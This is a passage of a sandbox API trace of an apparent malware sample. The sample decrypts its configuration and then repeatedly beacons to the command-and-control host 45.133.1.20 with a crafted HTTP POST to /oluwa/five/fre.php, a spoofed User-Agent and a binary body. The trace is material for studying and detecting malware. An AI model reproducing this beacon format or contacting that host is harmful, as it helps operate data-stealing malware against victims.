lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0196.608] send (s=0x4ec, buf=0x6b5c98*, len=242, flags=0) returned 242 [0196.609] send (s=0x4ec, buf=0x6bb998*, len=159, flags=0) returned 159 [0196.609] GetProcessHeap () returned 0x6a0000 [0196.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0196.609] recv (in: s=0x4ec, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0196.702] GetProcessHeap () returned 0x6a0000 [0196.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0196.704] GetProcessHeap () returned 0x6a0000 [0196.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0196.705] GetProcessHeap () returned 0x6a0000 [0196.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0196.705] GetProcessHeap () returned 0x6a0000 [0196.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0196.705] closesocket (s=0x4ec) returned 0 [0196.707] GetProcessHeap () returned 0x6a0000 [0196.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0196.707] GetProcessHeap () returned 0x6a0000 [0196.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0196.707] GetProcessHeap () returned 0x6a0000 [0196.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0196.708] GetProcessHeap () returned 0x6a0000 [0196.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0196.708] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xe38) returned 0x4ec [0196.726] Sleep (dwMilliseconds=0xea60) [0196.729] GetProcessHeap () returned 0x6a0000 [0196.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0196.730] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.732] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0196.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.749] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0196.760] GetProcessHeap () returned 0x6a0000 [0196.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0196.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.761] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0196.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.763] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0196.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.764] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0196.764] GetProcessHeap () returned 0x6a0000 [0196.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0196.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.766] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0196.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.769] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0196.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.771] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0196.771] GetProcessHeap () returned 0x6a0000 [0196.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0196.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.772] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0196.773] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.773] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0196.774] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.774] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0196.775] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.775] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0196.775] GetProcessHeap () returned 0x6a0000 [0196.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0196.776] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0196.776] GetProcessHeap () returned 0x6a0000 [0196.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0196.777] GetProcessHeap () returned 0x6a0000 [0196.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0196.777] GetProcessHeap () returned 0x6a0000 [0196.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0196.778] GetProcessHeap () returned 0x6a0000 [0196.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0196.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.781] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0196.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.790] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0196.806] GetProcessHeap () returned 0x6a0000 [0196.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0196.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.807] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0196.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.808] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0196.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.812] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0196.812] GetProcessHeap () returned 0x6a0000 [0196.812] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0196.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.814] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0196.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.815] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0196.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.816] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0196.816] GetProcessHeap () returned 0x6a0000 [0196.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0196.817] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.817] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0196.818] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.818] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0196.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.819] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0196.820] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.821] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0196.821] GetProcessHeap () returned 0x6a0000 [0196.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0196.821] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0196.824] GetProcessHeap () returned 0x6a0000 [0196.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa50 [0196.824] socket (af=2, type=1, protocol=6) returned 0x4f0 [0196.825] connect (s=0x4f0, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0196.852] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0196.852] GetProcessHeap () returned 0x6a0000 [0196.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0196.852] GetProcessHeap () returned 0x6a0000 [0196.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0196.855] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0196.856] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0196.856] GetProcessHeap () returned 0x6a0000 [0196.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0196.856] GetProcessHeap () returned 0x6a0000 [0196.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0196.857] GetProcessHeap () returned 0x6a0000 [0196.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0196.857] GetProcessHeap () returned 0x6a0000 [0196.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0196.858] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0196.859] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0196.859] GetProcessHeap () returned 0x6a0000 [0196.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0196.859] GetProcessHeap () returned 0x6a0000 [0196.860] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0196.860] send (s=0x4f0, buf=0x6b5c98*, len=242, flags=0) returned 242 [0196.861] send (s=0x4f0, buf=0x6bb998*, len=159, flags=0) returned 159 [0196.861] GetProcessHeap () returned 0x6a0000 [0196.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0196.861] recv (in: s=0x4f0, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0196.939] GetProcessHeap () returned 0x6a0000 [0196.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0196.939] GetProcessHeap () returned 0x6a0000 [0196.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0196.940] GetProcessHeap () returned 0x6a0000 [0196.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0196.940] GetProcessHeap () returned 0x6a0000 [0196.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0196.941] closesocket (s=0x4f0) returned 0 [0196.941] GetProcessHeap () returned 0x6a0000 [0196.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0196.941] GetProcessHeap () returned 0x6a0000 [0196.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0196.942] GetProcessHeap () returned 0x6a0000 [0196.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0196.942] GetProcessHeap () returned 0x6a0000 [0196.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0196.944] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd90) returned 0x4f0 [0196.946] Sleep (dwMilliseconds=0xea60) [0196.948] GetProcessHeap () returned 0x6a0000 [0196.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0196.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.949] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0196.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.959] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0196.970] GetProcessHeap () returned 0x6a0000 [0196.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0196.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.971] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0196.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.972] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0196.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.974] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0196.974] GetProcessHeap () returned 0x6a0000 [0196.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0196.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.978] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0196.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.979] CryptDestroyKey (hKey=0x6ad020) returned 1 [0196.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.077] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0197.077] GetProcessHeap () returned 0x6a0000 [0197.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0197.078] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.078] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0197.079] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.079] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0197.080] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.080] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0197.081] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.081] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0197.081] GetProcessHeap () returned 0x6a0000 [0197.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0197.082] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0197.082] GetProcessHeap () returned 0x6a0000 [0197.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0197.082] GetProcessHeap () returned 0x6a0000 [0197.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0197.083] GetProcessHeap () returned 0x6a0000 [0197.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0197.083] GetProcessHeap () returned 0x6a0000 [0197.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0197.084] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.084] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0197.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.090] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0197.100] GetProcessHeap () returned 0x6a0000 [0197.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0197.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.113] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0197.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.114] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0197.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.115] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0197.115] GetProcessHeap () returned 0x6a0000 [0197.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0197.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.116] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0197.117] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.117] CryptDestroyKey (hKey=0x6ad020) returned 1 [0197.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0197.118] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0197.118] GetProcessHeap () returned 0x6a0000 [0197.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0197.119] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.119] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0197.123] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.123] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0197.124] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.124] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0197.125] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0197.125] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0197.125] GetProcessHeap () returned 0x6a0000 [0197.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0197.125] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0197.125] GetProcessHeap () returned 0x6a0000 [0197.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0197.125] socket (af=2, type=1, protocol=6) returned 0x4f4 [0197.126] connect (s=0x4f4, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0197.149] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0197.149] GetProcessHeap () returned 0x6a0000 [0197.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0197.150] GetProcessHeap () returned 0x6a0000 [0197.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0197.150] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0197.151] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0197.151] GetProcessHeap () returned 0x6a0000 [0197.151] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0197.151] GetProcessHeap () returned 0x6a0000 [0197.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0197.152] GetProcessHeap () returned 0x6a0000 [0197.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0197.152] GetProcessHeap () returned 0x6a0000 [0197.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0197.153] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0197.154] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0197.154] GetProcessHeap () returned 0x6a0000 [0197.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0197.154] GetProcessHeap () returned 0x6a0000 [0197.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0197.154] send (s=0x4f4, buf=0x6b5c98*, len=242, flags=0) returned 242 [0197.155] send (s=0x4f4, buf=0x6bb998*, len=159, flags=0) returned 159 [0197.155] GetProcessHeap () returned 0x6a0000 [0197.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0197.155] recv (in: s=0x4f4, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0197.233] GetProcessHeap () returned 0x6a0000 [0197.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0197.235] GetProcessHeap () returned 0x6a0000 [0197.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0197.235] GetProcessHeap () returned 0x6a0000 [0197.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 